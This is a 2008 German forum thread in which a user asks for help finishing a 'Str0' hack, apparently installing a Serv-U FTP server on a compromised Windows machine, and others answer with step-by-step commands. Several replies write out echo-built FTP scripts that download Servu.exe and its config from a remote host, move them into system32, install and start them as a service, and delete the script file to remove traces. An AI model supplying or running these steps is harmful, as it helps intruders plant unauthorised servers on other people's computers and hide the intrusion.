Hilfe bei Str0 haxxorn?? weiß net mehr weiter

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von Pistolfreak, 17. November 2008 .

  1. 17. November 2008
    Hi Comunity,

    Also mein problem so weit habe ich die servu datein aufm str0 aber in der anleitung steht nochdas ich das machen muss

    ftp.exe -i -n -v -s:windows24.txt

    //Auf antwort warten und nicht verzweifeln\\

    "Name der .exe MIT der Endung" /i
    net start "Servicename"

    und da blicke ich net mehr durch was ich da eingeben soll für ne exe und wo ich das /i hinmachen soll bitte um hilfe..

    ihr könnt mich auch adden per icq 298-217-810..

    thx im voraus

    Pistolfreak
     
  2. 17. November 2008
    AW: Hilfe bei Str0 haxxorn?? weiß net mehr weiter

    du hast ja deine servu dateien hochgeladen
    eine davon sollte mit .exe enden (im original servudaemon.exe)
    jetzt hast du deine files wahrscheinlich im system32
    also schreibst du

    Code:
    %windir%\system32\servudaemon.exe /i
    wenn deine exe anders heißt, ersetzt du eben servudaemon mit deinem individuellen namen (nicht dem, der aufm perso steht sondern dem der datei)

    du kannst auch

    Code:
    -install
    /install
    -i
    schreiben

    das verzeichnis ist ggf. auch noch anzupassen
     
  3. 17. November 2008
    AW: Hilfe bei Str0 haxxorn?? weiß net mehr weiter

    liegen die denn im system32 ordner ich habe die nur mit dem befehl geschoben

    ftp.exe -i -n -v -s:windows24.txt

    und wenn ich denn

    ServUDaemon.exe /i eingebe (ist auch richtig)

    bekomm ich nicht ist auch richtig so nur jetzt wenn ich net start Servicename eingebe bekomm ich


    The service name is invalid

    ist das falsch kann ich da was machen oder ist der str0 denn doof??
     
  4. 17. November 2008
    AW: Hilfe bei Str0 haxxorn?? weiß net mehr weiter

    ja aber was steht bei dir in der windows24.txt ? da musst doch was reingeschrieben hast ^^

    bei mir sieht es fast so aus ^^
    Code:
    echo open 2.3.3.2>>c:\tmpry.log
    echo user anonymous ftp@ftp.com>>c:\tmpry.log
    echo BINARY>>c:\tmpry.log
    echo get Servu.exe>>c:\tmpry.log
    echo get servu.ini>>c:\tmpry.log
    echo quit>>c:\tmpry.log
    ftp -n -v -s:c:\tmpry.log
    
    move Servu.exe %windir%\system32
    move servu.ini %windir%\system32
    damit geht das ganze zeug erstmal in c:\
    und dann verschiebe ich es mit "move" in system32 ...
     
  5. 17. November 2008
    AW: Hilfe bei Str0 haxxorn?? weiß net mehr weiter

    Gib einfach mal

    Code:
    dir deinservuname.exe
    
    ein

    dann wird der Pfad ausgegeben wo sich deine Datei befindet!
     
  6. 17. November 2008
    AW: Hilfe bei Str0 haxxorn?? weiß net mehr weiter



    Lass es, du hast keine Ahnung, was du eingibst, weißt die Basis Eingaben in der WINDOWS CMD nicht. Lass es einfach.

    Ansonsten: Was steht in der windows24.txt drin?

    Da gibst du einen Ordner an, in den die ganzen Dateien geladen werden sollen. In den musst du rein in die servu installieren.

    E:/ Oh noes, 3 Posts in 1 Minute.
     
  7. 17. November 2008
    AW: Hilfe bei Str0 haxxorn?? weiß net mehr weiter

    wenn du keine angabe machst wo die dateien landen sollen
    so landen die immer automatisch bei system32 also in dem fall joa
     
  8. 17. November 2008
    AW: Hilfe bei Str0 haxxorn?? weiß net mehr weiter

    ja so sieht es ungefähr aus nur da smove habe ich net


    _________________________________________

    und jetzt habe ich eingegeben net start %windir%\system32\ServUDaemon.exe

    also müsste er sie ja jetzt starten habe auch danach eine leere nachricht bekommen..

    aber irgentwie kann ich mich nicht wirklich connecten mit flash fxp
     
  9. 17. November 2008
    AW: Hilfe bei Str0 haxxorn?? weiß net mehr weiter

    ja also

    move Servu.exe %windir%\system32
    move servu.ini %windir%\system32

    das noch moven und dann

    %windir%\system32\Servu.exe /i
    net start servu
    del c:\tmpry.log

    ab jetzt sollte die servu laufen und dein txt file gelöscht sein

    zur überprüfung ob sie läuft einfach
    sc query


    mal ne sache, nebenbei du solltest schon mit windows cmd umgehen können, weil das ist ja noch das einfachste an dem ganzen .... denke ohne vorwissen kommst nicht weit bzw wenn dir nicht zusätzlich was aneignest wird es auch nichts
     
  10. 17. November 2008
    AW: Hilfe bei Str0 haxxorn?? weiß net mehr weiter

    Wie sinnvoll ist es, dass in der Datei noch das eigentliche "echo command" vorhanden ist?!


    Und PS:
    Wozu die ganzen Parameter? Man sollte nicht nur sinnlos Tuts anwenden, die irgend nen Vollnap ausm RR geschrieben/kopiert hat. Das -s reicht vollkommen aus.

    PPS:

    Echo Open 127.0.0.1 21>>1.txt
    Echo eHArds51>>1.txt
    Echo ESewRa95>>1.txt
    Echo Binary>>1.txt
    Echo GET ServU.exe>>1.txt
    Echo GET ServU_ini.ini>>1.txt
    Echo Quit>>1.txt

    FTP.exe -s:1.txt

    Mehr musst du nicht machen um die files zu holen. Die landen dann in dem Verzeichnis, wo deine cmd ist (sollte wohl im system32 sein).

    Ausführen dann mit:

    ServU.exe /i
    net start ServU_Dienst_Name


    Und PPPS:

    den -i oder -install kannst vergessen beim Starten @ wer auch immer das gesagt hat.

    Und was am wichtigsten ist: Man sollte nicht wild "Str0 haxxorn", wenn man keine Ahnung von Windows hat. Das ist nichts wildes sich dei Befehle mal von Grund auf anzusehen und das zu verstehen...

    Und lass diese billige "leet Str0 haxxor" Schrift, das geht einen nur sinnlos auf den Sack und ist peinlich³.

    Mfg Halloweenracer
     
  11. 17. November 2008
    AW: Hilfe bei Str0 haxxorn?? weiß net mehr weiter

    recht hatter
    bis auf die tatsache, dass -i bzw -install nicht zu verachten ist ;D
    also kannste wirklich nutzen
    die ****nswitches können wirklich weg, kannst notfalls mit ftp /? nochmal nachschlagen
    entweder du ziehst dir tutorials rein bist du dumm stirbst oder versuchst mal eigeninitiative
    zu ergreifen und guckst, welcher cmd was macht, welcher switch was bewirkt und warum es
    sinnvoll ist, diesen dort anzuwenden
    gl & hf beim "hacken"

    mfg black.

    edit:

    ja darüber werde ich eine facharbeit verfassen... nicht
    ich gebe nach, da ich das nicht überprüfen kann/will
    ..tun wir
     
  12. 17. November 2008
    AW: Hilfe bei Str0 haxxorn?? weiß net mehr weiter

    Hoi,

    wenn du das ganze mal in ne Studie packen würdest, dann würde -i / -install mehr Fehler verursachen als /i Ist nunmal so ^^

    Aber ich denke, wir verstehn uns.. ^^

    Mfg Halloweenracer
     
  13. Video Script

    Videos zum Themenbereich

    * gefundene Videos auf YouTube, anhand der Überschrift.